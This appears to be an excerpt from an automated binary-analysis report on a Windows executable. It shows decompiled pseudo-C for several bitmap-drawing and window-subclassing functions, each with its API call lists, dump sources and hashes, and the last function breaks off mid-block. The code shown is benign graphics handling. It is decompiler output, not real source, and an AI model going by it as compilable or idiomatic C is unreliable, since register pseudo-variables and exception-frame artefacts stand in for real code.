                                                                        							_push(0);
                                                                        							_push(0);
                                                                        							_push(_v16);
                                                                        							_push(_v108);
                                                                        							_push(_v112);
                                                                        							_push(0);
                                                                        							_push(0);
                                                                        							_push(_v20);
                                                                        							L00406ABC();
                                                                        							SetBkColor(_v16, _t77);
                                                                        							if(_v28 != 0) {
                                                                        								SelectObject(_v16, _v28);
                                                                        							}
                                                                        							if(_v21 != 0) {
                                                                        								DeleteObject(_t107);
                                                                        							}
                                                                        							_pop(_t117);
                                                                        							 *[fs:eax] = _t117;
                                                                        							_push(0x42427a);
                                                                        							return DeleteDC(_v16);
                                                                        						} else {
                                                                        							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
                                                                        							if(_v32 != 0) {
                                                                        								SelectObject(_v20, _v32);
                                                                        							}
                                                                        							goto L18;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        			}
                                                                        0x00424288
                                                                        0x00000000
                                                                        0x0042427e
                                                                        0x00424165
                                                                        0x00424149

                                                                        APIs
                                                                        • GetObjectA.GDI32(00000000,00000054,?), ref: 004240E3
                                                                        • 72E7AC50.USER32(00000000,00000000,004242BB,?,00000000,?,?), ref: 00424111
                                                                        • 72E7A590.GDI32(?,00000000,00000000,004242BB,?,00000000,?,?), ref: 00424122
                                                                        • 72E7A410.GDI32(?,?,00000001,00000001,00000000,?,00000000,00000000,004242BB,?,00000000,?,?), ref: 0042413D
                                                                        • SelectObject.GDI32(?,00000000), ref: 00424157
                                                                        • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 00424179
                                                                        • 72E7A590.GDI32(?,?,00000000,?,?,00000001,00000001,00000000,?,00000000,00000000,004242BB,?,00000000,?,?), ref: 00424187
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004241CF
                                                                        • 72E7B410.GDI32(00000000,?,00000000,00000000,00000000,00000000,00424273,?,?,?,00000000,?,?,00000001,00000001,00000000), ref: 004241E2
                                                                        • 72E7B150.GDI32(00000000,00000000,?,00000000,00000000,00000000,00000000,00424273,?,?,?,00000000,?,?,00000001,00000001), ref: 004241EB
                                                                        • 72E7B410.GDI32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00424273,?,?,?,00000000,?), ref: 004241F7
                                                                        • 72E7B150.GDI32(?,?,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00424273,?,?,?,00000000), ref: 00424200
                                                                        • SetBkColor.GDI32(00000000,00000000), ref: 0042420A
                                                                        • 72E897E0.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,00000000,00000000,00424273), ref: 0042422E
                                                                        • SetBkColor.GDI32(00000000,00000000), ref: 00424238
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0042424B
                                                                        • DeleteObject.GDI32(00000000), ref: 00424257
                                                                        • DeleteDC.GDI32(00000000), ref: 0042426D
                                                                        • SelectObject.GDI32(?,00000000), ref: 00424288
                                                                        • DeleteDC.GDI32(00000000), ref: 004242A4
                                                                        • 72E7B380.USER32(00000000,00000000,004242C2,00000001,00000000,?,00000000,00000000,004242BB,?,00000000,?,?), ref: 004242B5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Object$Select$Delete$A590B150B410Color$A410B380E897
                                                                        • String ID:
                                                                        • API String ID: 4241548881-0
                                                                        • Opcode ID: 6f5505679764149f8975d96c7f15921c777c432716e7e995d3116d72c8a38ef9
                                                                        • Instruction ID: b199b53a5d34a191db7efce3f80a8b69dcc7b03c55fcec5dd27acc42e0efb18e
                                                                        • Opcode Fuzzy Hash: 6f5505679764149f8975d96c7f15921c777c432716e7e995d3116d72c8a38ef9
                                                                        • Instruction Fuzzy Hash: AC514C71F04214ABDB10EBEADC45FAFB7FCEB48704F51486AB214F7281D67899408B68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 65%
                                                                        			E00424EBC(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr* _v12;
                                                                        				void* _v16;
                                                                        				struct HDC__* _v20;
                                                                        				char _v24;
                                                                        				intOrPtr* _v28;
                                                                        				intOrPtr _v32;
                                                                        				intOrPtr _v36;
                                                                        				signed int _v37;
                                                                        				intOrPtr _v44;
                                                                        				void* _v48;
                                                                        				struct HDC__* _v52;
                                                                        				intOrPtr _v56;
                                                                        				intOrPtr* _v60;
                                                                        				intOrPtr* _v64;
                                                                        				short _v66;
                                                                        				short _v68;
                                                                        				signed short _v70;
                                                                        				signed short _v72;
                                                                        				void* _v76;
                                                                        				intOrPtr _v172;
                                                                        				char _v174;
                                                                        				intOrPtr _t150;
                                                                        				signed int _t160;
                                                                        				intOrPtr _t163;
                                                                        				void* _t166;
                                                                        				void* _t174;
                                                                        				void* _t183;
                                                                        				signed int _t188;
                                                                        				intOrPtr _t189;
                                                                        				struct HDC__* _t190;
                                                                        				struct HDC__* _t204;
                                                                        				signed int _t208;
                                                                        				signed short _t214;
                                                                        				intOrPtr _t241;
                                                                        				intOrPtr* _t245;
                                                                        				intOrPtr _t251;
                                                                        				intOrPtr _t289;
                                                                        				intOrPtr _t290;
                                                                        				intOrPtr _t295;
                                                                        				signed int _t297;
                                                                        				signed int _t317;
                                                                        				void* _t319;
                                                                        				void* _t320;
                                                                        				signed int _t321;
                                                                        				void* _t322;
                                                                        				void* _t323;
                                                                        				void* _t324;
                                                                        				intOrPtr _t325;
                                                                        
                                                                        				_t316 = __edi;
                                                                        				_t323 = _t324;
                                                                        				_t325 = _t324 + 0xffffff54;
                                                                        				_t319 = __ecx;
                                                                        				_v12 = __edx;
                                                                        				_v8 = __eax;
                                                                        				_v52 = 0;
                                                                        				_v44 = 0;
                                                                        				_v60 = 0;
                                                                        				 *((intOrPtr*)( *_v12 + 8))(__edi, __esi, __ebx, _t322);
                                                                        				_v37 = _v36 == 0xc;
                                                                        				if(_v37 != 0) {
                                                                        					_v36 = 0x28;
                                                                        				}
                                                                        				_v28 = E00402754(_v36 + 0x40c);
                                                                        				_v64 = _v28;
                                                                        				_push(_t323);
                                                                        				_push(0x4253d9);
                                                                        				_push( *[fs:edx]);
                                                                        				 *[fs:edx] = _t325;
                                                                        				_push(_t323);
                                                                        				_push(0x4253ac);
                                                                        				_push( *[fs:edx]);
                                                                        				 *[fs:edx] = _t325;
                                                                        				if(_v37 == 0) {
                                                                        					 *((intOrPtr*)( *_v12 + 8))();
                                                                        					_t320 = _t319 - _v36;
                                                                        					_t150 =  *((intOrPtr*)(_v64 + 0x10));
                                                                        					if(_t150 != 3 && _t150 != 0) {
                                                                        						_v60 = E004035AC(1);
                                                                        						if(_a4 == 0) {
                                                                        							E00402EF0( &_v174, 0xe);
                                                                        							_v174 = 0x4d42;
                                                                        							_v172 = _v36 + _t320;
                                                                        							_a4 =  &_v174;
                                                                        						}
                                                                        						 *((intOrPtr*)( *_v60 + 0xc))();
                                                                        						 *((intOrPtr*)( *_v60 + 0xc))();
                                                                        						 *((intOrPtr*)( *_v60 + 0xc))();
                                                                        						E00416BB4(_v60,  *_v60, _v12, _t316, _t320, _t320, 0);
                                                                        						 *((intOrPtr*)( *_v60 + 0x10))();
                                                                        						_v12 = _v60;
                                                                        					}
                                                                        				} else {
                                                                        					 *((intOrPtr*)( *_v12 + 8))();
                                                                        					_t251 = _v64;
                                                                        					E00402EF0(_t251, 0x28);
                                                                        					_t241 = _t251;
                                                                        					 *(_t241 + 4) = _v72 & 0x0000ffff;
                                                                        					 *(_t241 + 8) = _v70 & 0x0000ffff;
                                                                        					 *((short*)(_t241 + 0xc)) = _v68;
                                                                        					 *((short*)(_t241 + 0xe)) = _v66;
                                                                        					_t320 = _t319 - 0xc;
                                                                        				}
                                                                        				_t245 = _v64;
                                                                        				 *_t245 = _v36;
                                                                        				_v32 = _v28 + _v36;
                                                                        				if( *((short*)(_t245 + 0xc)) != 1) {
                                                                        					E00420A08();
                                                                        				}
                                                                        				if(_v36 == 0x28) {
                                                                        					_t214 =  *(_t245 + 0xe);
                                                                        					if(_t214 == 0x10 || _t214 == 0x20) {
                                                                        						if( *((intOrPtr*)(_t245 + 0x10)) == 3) {
                                                                        							E00416B44(_v12, 0xc, _v32);
                                                                        							_v32 = _v32 + 0xc;
                                                                        							_t320 = _t320 - 0xc;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				if( *(_t245 + 0x20) == 0) {
                                                                        					 *(_t245 + 0x20) = E00420C98( *(_t245 + 0xe));
                                                                        				}
                                                                        				_t317 = _v37 & 0x000000ff;
                                                                        				_t257 =  *(_t245 + 0x20) * 0;
                                                                        				E00416B44(_v12,  *(_t245 + 0x20) * 0, _v32);
                                                                        				_t321 = _t320 -  *(_t245 + 0x20) * 0;
                                                                        				if( *(_t245 + 0x14) == 0) {
                                                                        					_t297 =  *(_t245 + 0xe) & 0x0000ffff;
                                                                        					_t208 = E00420CB8( *((intOrPtr*)(_t245 + 4)), 0x20, _t297);
                                                                        					asm("cdq");
                                                                        					_t257 = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
                                                                        					 *(_t245 + 0x14) = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
                                                                        				}
                                                                        				_t160 =  *(_t245 + 0x14);
                                                                        				if(_t321 > _t160) {
                                                                        					_t321 = _t160;
                                                                        				}
                                                                        				if(_v37 != 0) {
                                                                        					_t160 = E00420F60(_v32);
                                                                        				}
                                                                        				_push(0);
                                                                        				L00406EB4();
                                                                        				_v16 = E00420B28(_t160);
                                                                        				_push(_t323);
                                                                        				_push(0x425327);
                                                                        				_push( *[fs:edx]);
                                                                        				 *[fs:edx] = _t325;
                                                                        				_t163 =  *((intOrPtr*)(_v64 + 0x10));
                                                                        				if(_t163 == 0 || _t163 == 3) {
                                                                        					if( *0x47a514 == 0) {
                                                                        						_push(0);
                                                                        						_push(0);
                                                                        						_push( &_v24);
                                                                        						_push(0);
                                                                        						_push(_v28);
                                                                        						_t166 = _v16;
                                                                        						_push(_t166);
                                                                        						L00406AEC();
                                                                        						_v44 = _t166;
                                                                        						if(_v44 == 0 || _v24 == 0) {
                                                                        							if(GetLastError() != 0) {
                                                                        								E0040B330(_t245, _t257, _t317, _t321);
                                                                        							} else {
                                                                        								E00420A08();
                                                                        							}
                                                                        						}
                                                                        						_push(_t323);
                                                                        						_push( *[fs:eax]);
                                                                        						 *[fs:eax] = _t325;
                                                                        						E00416B44(_v12, _t321, _v24);
                                                                        						_pop(_t289);
                                                                        						 *[fs:eax] = _t289;
                                                                        						_t290 = 0x4252f6;
                                                                        						 *[fs:eax] = _t290;
                                                                        						_push(E0042532E);
                                                                        						_t174 = _v16;
                                                                        						_push(_t174);
                                                                        						_push(0);
                                                                        						L00407124();
                                                                        						return _t174;
                                                                        					} else {
                                                                        						goto L27;
                                                                        					}
                                                                        				} else {
                                                                        					L27:
                                                                        					_v20 = 0;
                                                                        					_v24 = E00402754(_t321);
                                                                        					_push(_t323);
                                                                        					_push(0x42528f);
                                                                        					_push( *[fs:edx]);
                                                                        					 *[fs:edx] = _t325;
                                                                        					_t263 = _t321;
                                                                        					E00416B44(_v12, _t321, _v24);
                                                                        					_push(_v16);
                                                                        					L00406AE4();
                                                                        					_v20 = E00420B28(_v16);
                                                                        					_push(1);
                                                                        					_push(1);
                                                                        					_t183 = _v16;
                                                                        					_push(_t183);
                                                                        					L00406ADC();
                                                                        					_v48 = SelectObject(_v20, _t183);
                                                                        					_v56 = 0;
                                                                        					_t188 =  *(_v64 + 0x20);
                                                                        					if(_t188 > 0) {
                                                                        						_t263 = _t188;
                                                                        						_v52 = E00421218(0, _t188);
                                                                        						_push(0);
                                                                        						_push(_v52);
                                                                        						_t204 = _v20;
                                                                        						_push(_t204);
                                                                        						L00406C5C();
                                                                        						_v56 = _t204;
                                                                        						_push(_v20);
                                                                        						L00406C2C();
                                                                        					}
                                                                        					_push(_t323);
                                                                        					_push(0x425263);
                                                                        					_push( *[fs:edx]);
                                                                        					 *[fs:edx] = _t325;
                                                                        					_push(0);
                                                                        					_t189 = _v28;
                                                                        					_push(_t189);
                                                                        					_push(_v24);
                                                                        					_push(4);
                                                                        					_push(_t189);
                                                                        					_t190 = _v20;
                                                                        					_push(_t190);
                                                                        					L00406AF4();
                                                                        					_v44 = _t190;
                                                                        					if(_v44 == 0) {
                                                                        						if(GetLastError() != 0) {
                                                                        							E0040B330(_t245, _t263, _t317, _t321);
                                                                        						} else {
                                                                        							E00420A08();
                                                                        						}
                                                                        					}
                                                                        					_pop(_t295);
                                                                        					 *[fs:eax] = _t295;
                                                                        					_push(E0042526A);
                                                                        					if(_v56 != 0) {
                                                                        						_push(0xffffffff);
                                                                        						_push(_v56);
                                                                        						_push(_v20);
                                                                        						L00406C5C();
                                                                        					}
                                                                        					return DeleteObject(SelectObject(_v20, _v48));
                                                                        				}
                                                                        			}


                                                                        APIs
                                                                        • 72E7AC50.USER32(00000000,?,00000000,004253D9,?,?), ref: 00425126
                                                                        • 72E7A590.GDI32(00000001,00000000,0042528F,?,00000000,00425327,?,00000000,?,00000000,004253D9,?,?), ref: 0042518B
                                                                        • 72E7A520.GDI32(00000001,00000001,00000001,00000001,00000000,0042528F,?,00000000,00425327,?,00000000,?,00000000,004253D9,?,?), ref: 004251A0
                                                                        • SelectObject.GDI32(?,00000000), ref: 004251AA
                                                                        • 72E7B410.GDI32(?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,0042528F,?,00000000,00425327,?,00000000), ref: 004251DA
                                                                        • 72E7B150.GDI32(?,?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,0042528F,?,00000000,00425327), ref: 004251E6
                                                                        • 72E7A7F0.GDI32(?,?,00000004,00000000,?,00000000,00000000,00425263,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 0042520A
                                                                        • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,00425263,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 00425218
                                                                        • 72E7B410.GDI32(?,00000000,000000FF,0042526A,00000000,?,00000000,00000000,00425263,?,?,00000000,00000001,00000001,00000001,00000001), ref: 0042524A
                                                                        • SelectObject.GDI32(?,?), ref: 00425257
                                                                        • DeleteObject.GDI32(00000000), ref: 0042525D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Object$B410Select$A520A590B150DeleteErrorLast
                                                                        • String ID: ($BM$x#A
                                                                        • API String ID: 3415089252-1550879612
                                                                        • Opcode ID: b91efd67f6c95568d4d1e3cc61e066766e2b2bd289b766a2555f1655cfd9dfd3
                                                                        • Instruction ID: 3b266c622e7d5c61ee199f7101d8b2b068e3375d9a97a10e13efc2d829a2294f
                                                                        • Opcode Fuzzy Hash: b91efd67f6c95568d4d1e3cc61e066766e2b2bd289b766a2555f1655cfd9dfd3
                                                                        • Instruction Fuzzy Hash: 6FD14C70B002189FDF04DFA9D885BAEBBF5EF49304F51846AE905EB395D7389840CB69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 55%
                                                                        			E0046745C(intOrPtr __eax, char __edx) {
                                                                        				intOrPtr _v8;
                                                                        				char _v9;
                                                                        				intOrPtr* _v16;
                                                                        				intOrPtr* _v20;
                                                                        				intOrPtr* _v24;
                                                                        				intOrPtr _v28;
                                                                        				char _v44;
                                                                        				char _v60;
                                                                        				void* __edi;
                                                                        				void* __ebp;
                                                                        				signed int _t170;
                                                                        				signed int _t176;
                                                                        				void* _t209;
                                                                        				void* _t213;
                                                                        				intOrPtr _t218;
                                                                        				intOrPtr _t241;
                                                                        				void* _t254;
                                                                        				void* _t325;
                                                                        				void* _t345;
                                                                        				void* _t361;
                                                                        				void* _t368;
                                                                        				intOrPtr _t382;
                                                                        				intOrPtr _t388;
                                                                        				struct HDC__* _t392;
                                                                        				struct HDC__* _t393;
                                                                        				struct HDC__* _t394;
                                                                        				void* _t421;
                                                                        				void* _t422;
                                                                        				void* _t423;
                                                                        				intOrPtr _t447;
                                                                        				intOrPtr _t464;
                                                                        				void* _t478;
                                                                        				signed int _t486;
                                                                        				void* _t491;
                                                                        				void* _t493;
                                                                        				void* _t495;
                                                                        				intOrPtr _t496;
                                                                        				void* _t506;
                                                                        
                                                                        				_t493 = _t495;
                                                                        				_t496 = _t495 + 0xffffffc8;
                                                                        				_v9 = __edx;
                                                                        				_v8 = __eax;
                                                                        				if(_v9 == 2 &&  *(_v8 + 0x20) < 3) {
                                                                        					_v9 = 0;
                                                                        				}
                                                                        				_t388 =  *((intOrPtr*)(_v8 + 0xc));
                                                                        				if(_t388 != 0xffffffff) {
                                                                        					L24:
                                                                        					return _t388;
                                                                        				} else {
                                                                        					_t170 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x2c))();
                                                                        					if((_t170 |  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x20))()) == 0) {
                                                                        						goto L24;
                                                                        					} else {
                                                                        						_t176 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x2c))();
                                                                        						asm("cdq");
                                                                        						_t486 = _t176 / ( *(_v8 + 0x20) & 0x000000ff);
                                                                        						_t491 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x20))();
                                                                        						if( *((intOrPtr*)(_v8 + 8)) == 0) {
                                                                        							_t503 =  *0x47ac64;
                                                                        							if( *0x47ac64 == 0) {
                                                                        								 *0x47ac64 = E00467150(1);
                                                                        							}
                                                                        							_t382 =  *0x47ac64; // 0x0
                                                                        							 *((intOrPtr*)(_v8 + 8)) = E004671C4(_t382, _t491, _t486);
                                                                        						}
                                                                        						_v16 = E004242CC(1);
                                                                        						 *[fs:eax] = _t496;
                                                                        						 *((intOrPtr*)( *_v16 + 0x40))( *[fs:eax], 0x467a0b, _t493);
                                                                        						 *((intOrPtr*)( *_v16 + 0x34))();
                                                                        						E00412BCC(_t486, 0,  &_v44, _t491);
                                                                        						E0041FC50( *((intOrPtr*)(E00424894(_v16) + 0x14)), _t486, 0x8000000f, _t486, _t493, _t503);
                                                                        						E0042405C( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x24))());
                                                                        						 *((intOrPtr*)( *_v16 + 0x38))();
                                                                        						if(_v9 >=  *(_v8 + 0x20)) {
                                                                        						}
                                                                        						E00412BCC(1 * _t486, 0,  &_v60, _t491);
                                                                        						_t209 = _v9 - 1;
                                                                        						_t506 = _t209;
                                                                        						if(_t506 < 0) {
                                                                        							L14:
                                                                        							_push( &_v60);
                                                                        							_t213 = E00424894( *((intOrPtr*)(_v8 + 4)));
                                                                        							E00420180(E00424894(_v16),  &_v44, _t507, _t213);
                                                                        							_t218 =  *((intOrPtr*)(_v8 + 4));
                                                                        							_t508 =  *((char*)(_t218 + 0x38)) - 1;
                                                                        							if( *((char*)(_t218 + 0x38)) != 1) {
                                                                        								 *((intOrPtr*)(_v8 + 0xc)) = E004670F4( *((intOrPtr*)(_v8 + 8)), 0x20000000, _v16, __eflags);
                                                                        							} else {
                                                                        								 *((intOrPtr*)(_v8 + 0xc)) = E004670F4( *((intOrPtr*)(_v8 + 8)),  *((intOrPtr*)(_v8 + 0x1c)), _v16, _t508);
                                                                        							}
                                                                        							goto L23;
                                                                        						} else {
                                                                        							if(_t506 == 0) {
                                                                        								_v24 = 0;
                                                                        								_v20 = 0;
                                                                        								 *[fs:eax] = _t496;
                                                                        								_v24 = E004242CC(1);
                                                                        								_v20 = E004242CC(1);
                                                                        								 *((intOrPtr*)( *_v20 + 8))( *[fs:eax], 0x4679cf, _t493);
                                                                        								 *((intOrPtr*)( *_v20 + 0x6c))();
                                                                        								_t241 = _v8;
                                                                        								__eflags =  *((char*)(_t241 + 0x20)) - 1;
                                                                        								if( *((char*)(_t241 + 0x20)) <= 1) {
                                                                        									 *((intOrPtr*)( *_v24 + 8))();
                                                                        									 *((intOrPtr*)( *_v24 + 0x6c))();
                                                                        									E0041FC50( *((intOrPtr*)(E00424894(_v24) + 0x14)),  *_v24, 0, _t486, _t493, __eflags);
                                                                        									_t415 =  *_v24;
                                                                        									 *((intOrPtr*)( *_v24 + 0x40))();
                                                                        									_t254 = E00424950(_v24);
                                                                        									__eflags = _t254;
                                                                        									if(_t254 != 0) {
                                                                        										E0041F464( *((intOrPtr*)(E00424894(_v24) + 0xc)), 0xffffff);
                                                                        										__eflags = 0;
                                                                        										E004256E4(_v24, 0);
                                                                        										E0041FC50( *((intOrPtr*)(E00424894(_v24) + 0x14)), _t415, 0xffffff, _t486, _t493, __eflags);
                                                                        									}
                                                                        									E004256E4(_v24, 1);
                                                                        									_t391 = E00424894(_v16);
                                                                        									E0041FC50( *((intOrPtr*)(_t258 + 0x14)), _t415, 0x8000000f, _t486, _t493, __eflags);
                                                                        									E004202E8(_t258,  &_v44);
                                                                        									E0041FC50( *((intOrPtr*)(_t258 + 0x14)), _t415, 0x80000014, _t486, _t493, __eflags);
                                                                        									SetTextColor(E00420730(_t391), 0);
                                                                        									SetBkColor(E00420730(_t391), 0xffffff);
                                                                        									_push(0xe20746);
                                                                        									_push(0);
                                                                        									_push(0);
                                                                        									_push(E00420730(E00424894(_v24)));
                                                                        									_push(_t491);
                                                                        									_push(_t486);
                                                                        									_push(1);
                                                                        									_push(1);
                                                                        									_push(E00420730(_t391));
                                                                        									L00406ABC();
                                                                        									E0041FC50( *((intOrPtr*)(_t391 + 0x14)), _t415, 0x80000010, _t486, _t493, __eflags);
                                                                        									SetTextColor(E00420730(_t391), 0);
                                                                        									SetBkColor(E00420730(_t391), 0xffffff);
                                                                        									_push(0xe20746);
                                                                        									_push(0);
                                                                        									_push(0);
                                                                        									_push(E00420730(E00424894(_v24)));
                                                                        									_push(_t491);
                                                                        									_push(_t486);
                                                                        									_push(0);
                                                                        									_push(0);
                                                                        									_push(E00420730(_t391));
                                                                        									L00406ABC();
                                                                        								} else {
                                                                        									_v28 = E00424894(_v16);
                                                                        									E00424894(_v20);
                                                                        									E00420180(_v28,  &_v44, __eflags,  &_v60);
                                                                        									E004256E4(_v24, 1);
                                                                        									 *((intOrPtr*)( *_v24 + 0x40))();
                                                                        									 *((intOrPtr*)( *_v24 + 0x34))();
                                                                        									E0041FC50( *((intOrPtr*)(E00424894(_v20) + 0x14)),  *_v24, 0xffffff, _t486, _t493, __eflags);
                                                                        									_push( &_v60);
                                                                        									_push(E00424894(_v20));
                                                                        									_t325 = E00424894(_v24);
                                                                        									_pop(_t421);
                                                                        									E00420180(_t325,  &_v44, __eflags);
                                                                        									E0041FC50( *((intOrPtr*)(_v28 + 0x14)), _t421, 0x80000014, _t486, _t493, __eflags);
                                                                        									_t392 = E00420730(_v28);
                                                                        									SetTextColor(_t392, 0);
                                                                        									SetBkColor(_t392, 0xffffff);
                                                                        									_push(0xe20746);
                                                                        									_push(0);
                                                                        									_push(0);
                                                                        									_push(E00420730(E00424894(_v24)));
                                                                        									_push(_t491);
                                                                        									_push(_t486);
                                                                        									_push(0);
                                                                        									_push(0);
                                                                        									_push(_t392);
                                                                        									L00406ABC();
                                                                        									E0041FC50( *((intOrPtr*)(E00424894(_v20) + 0x14)), _t421, 0x808080, _t486, _t493, __eflags);
                                                                        									_push( &_v60);
                                                                        									_push(E00424894(_v20));
                                                                        									_t345 = E00424894(_v24);
                                                                        									_pop(_t422);
                                                                        									E00420180(_t345,  &_v44, __eflags);
                                                                        									E0041FC50( *((intOrPtr*)(_v28 + 0x14)), _t422, 0x80000010, _t486, _t493, __eflags);
                                                                        									_t393 = E00420730(_v28);
                                                                        									SetTextColor(_t393, 0);
                                                                        									SetBkColor(_t393, 0xffffff);
                                                                        									_push(0xe20746);
                                                                        									_push(0);
                                                                        									_push(0);
                                                                        									_push(E00420730(E00424894(_v24)));
                                                                        									_push(_t491);
                                                                        									_push(_t486);
                                                                        									_push(0);
                                                                        									_push(0);
                                                                        									_push(_t393);
                                                                        									L00406ABC();
                                                                        									_push(E0041EFA4( *((intOrPtr*)(_v8 + 0x1c))));
                                                                        									_t361 = E00424894(_v20);
                                                                        									_pop(_t478);
                                                                        									E0041FC50( *((intOrPtr*)(_t361 + 0x14)), _t422, _t478, _t486, _t493, __eflags);
                                                                        									_push( &_v60);
                                                                        									_push(E00424894(_v20));
                                                                        									_t368 = E00424894(_v24);
                                                                        									_pop(_t423);
                                                                        									E00420180(_t368,  &_v44, __eflags);
                                                                        									E0041FC50( *((intOrPtr*)(_v28 + 0x14)), _t423, 0x8000000f, _t486, _t493, __eflags);
                                                                        									_t394 = E00420730(_v28);
                                                                        									SetTextColor(_t394, 0);
                                                                        									SetBkColor(_t394, 0xffffff);
                                                                        									_push(0xe20746);
                                                                        									_push(0);
                                                                        									_push(0);
                                                                        									_push(E00420730(E00424894(_v24)));
                                                                        									_push(_t491);
                                                                        									_push(_t486);
                                                                        									_push(0);
                                                                        									_push(0);
                                                                        									_push(_t394);
                                                                        									L00406ABC();
                                                                        								}
                                                                        								__eflags = 0;
                                                                        								_pop(_t464);
                                                                        								 *[fs:eax] = _t464;
                                                                        								_push(0x4679d6);
                                                                        								E004035DC(_v20);
                                                                        								return E004035DC(_v24);
                                                                        							} else {
                                                                        								_t507 = _t209 - 0xffffffffffffffff;
                                                                        								if(_t209 - 0xffffffffffffffff < 0) {
                                                                        									goto L14;
                                                                        								}
                                                                        								L23:
                                                                        								_pop(_t447);
                                                                        								 *[fs:eax] = _t447;
                                                                        								_push(0x467a12);
                                                                        								return E004035DC(_v16);
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        			}










































                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: DA
                                                                        • API String ID: 0-2080325668
                                                                        • Opcode ID: f65dbce997301d1b3ac4fc3d648d70f44be36d711d5e80a2521b17264e575958
                                                                        • Instruction ID: 1aaab0506d005b2b6a366c37f16578aea9443783ae75c99a7e7321e86aad177a
                                                                        • Opcode Fuzzy Hash: f65dbce997301d1b3ac4fc3d648d70f44be36d711d5e80a2521b17264e575958
                                                                        • Instruction Fuzzy Hash: FC025074B04115AFD700EBA9D986E9EB7F5EF48318F10456AF404EB392DA38ED01CB69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 97%
                                                                        			E004787FC(int __eax, void* __eflags) {
                                                                        				int _v8;
                                                                        				char* _t87;
                                                                        				int _t89;
                                                                        				long _t92;
                                                                        				int _t117;
                                                                        				struct HWND__* _t146;
                                                                        				void* _t149;
                                                                        				void* _t150;
                                                                        				struct HWND__* _t151;
                                                                        				intOrPtr _t162;
                                                                        				struct HWND__* _t168;
                                                                        				void* _t170;
                                                                        				struct HWND__* _t171;
                                                                        				struct HWND__* _t172;
                                                                        				intOrPtr _t174;
                                                                        				intOrPtr _t176;
                                                                        
                                                                        				_t174 = _t176;
                                                                        				_v8 = __eax;
                                                                        				E0042D3EC(_v8);
                                                                        				_t146 = GetWindow(E0043CC2C(_v8), 5);
                                                                        				 *(_v8 + 0x248) = _t146;
                                                                        				_t168 = _t146;
                                                                        				 *(_v8 + 0x268) = _t168;
                                                                        				 *((intOrPtr*)(_v8 + 0x26c)) = GetWindowLongA(_t168, 0xfffffffc);
                                                                        				SetWindowLongA( *(_v8 + 0x268), 0xfffffffc,  *(_v8 + 0x270));
                                                                        				if( *((intOrPtr*)(_v8 + 0x281)) - 2 < 0) {
                                                                        					_t151 = GetWindow(GetWindow(E0043CC2C(_v8), 5), 5);
                                                                        					if(_t151 != 0) {
                                                                        						if( *((char*)(_v8 + 0x281)) == 1) {
                                                                        							_t172 = _t151;
                                                                        							 *(_v8 + 0x244) = _t172;
